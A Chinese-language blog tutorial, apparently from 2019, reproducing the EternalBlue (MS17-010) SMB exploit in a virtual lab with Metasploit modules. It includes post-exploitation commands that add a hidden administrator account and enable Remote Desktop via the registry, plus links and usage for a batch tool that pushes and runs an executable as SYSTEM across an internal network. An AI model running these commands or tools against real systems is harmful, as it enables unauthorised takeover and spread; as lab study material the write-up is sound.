MENU

永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程

事情起因

虽然距离上一次WannaCry席卷全球(17-05-12)已经过去一年多了,现在来复现有炒冷饭的嫌疑,但是还是有价值的

参考文章:

环境准备

  • Kali:192.168.2.6
  • Win7_SP1:192.168.2.7:默认为Administrator账户无密码
  • WinXP_SP3:192.168.2.4

使用metasploit

搜索模块

使用metasploit来进行扫描和攻击,我们先看一下关于ms17_010的模块有哪些:

扫描模块用

auxiliary/admin/smb/ms17_010_command

或者使用这个

auxiliary/scanner/smb/smb_ms17_010

攻击模块我们使用exploit/windows/smb/ms17_010_eternalblue

使用扫描模块进行扫描

auxiliary/admin/smb/ms17_010_command

可以看到winxp扫描成功了,win7没有扫描到,我们换另一个扫描模块:

auxiliary/scanner/smb/smb_ms17_010

可以看到这个模块两个靶机它都认为可以攻击

使用攻击模块进行攻击

exploit/windows/smb/ms17_010_eternalblue

不一定每次都攻击成功,我攻击了好多次,最后关掉全部虚拟机清理所有垃圾重启就意外成功了

对靶机进行控制

此处补充一下哪下shell中文显示乱码的问题:

输入chcp 65001即可

创建用户并添加到管理员组

net user soapffz adminpasswd /add
net localgroup administrators soapffz /add

开启远程桌面功能

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭时使用如下语句:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

远程桌面连接

如果你的电脑是登陆了其他账户的话,这个远程桌面窗口会一直等待20秒左右,这边没有反应的话就会把管理员账户挤下去,就进桌面了:

Windows下的检测&&攻击工具

EternalBlues批量检测工具

下载连接:http://omerez.com/repository/EternalBlues.exe

可以批量检测当前电脑所在局域网内的主机是否存在ms17_010漏洞(速度较快):

MS_17_010_Scanv2.1检测工具

下载链接:https://www.lanzous.com/i359xch

速度较慢:

cping批量检测工具(19-02-23更新)

介绍及使用参考文章:内网 - 扫描存活主机

k8加强版zzz攻击工具(19-02-23更新)

内网批量MS17-010溢出工具,出自k8团队:https://www.cnblogs.com/k8gege/p/10391101.html

以下教程搬运自k8:

工具:k8加强版zzz

编译:python

漏洞:MS17-010

用法:

zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe参数
zzz_exploit.exe 192.11.22.82 exe参数 管道名

如exe启动参数为  m.exe -Start 实战命令为 zzz_exploit.exe 192.11.22.82 -Start

内网批量

可结合cping批量溢出内网,将名称改为smbcheck即可,但exe必须使用无参版。(其它工具也可以,提供个IP参数即可)

因为cping只会传IP进去,不会传其它参数。使用前需将任意exe改名为ma.dat

溢出成功会自动将exe传入目标机器,并以system权限启动exe程序。

我们先试一下不带exe程序执行的效果:

然后我们把一个经典的IP雷达工具按照教程所示改名为ma.dat放到文件夹中:

然后再试一下:

可以看到上传我们的IP雷达exe到了C:\WINDOWS\Temp\msupdate.exe,但是我们这不是一个马子所以启动服务失败了:

大概用法就是这样

最后编辑于: 2019 年 07 月 13 日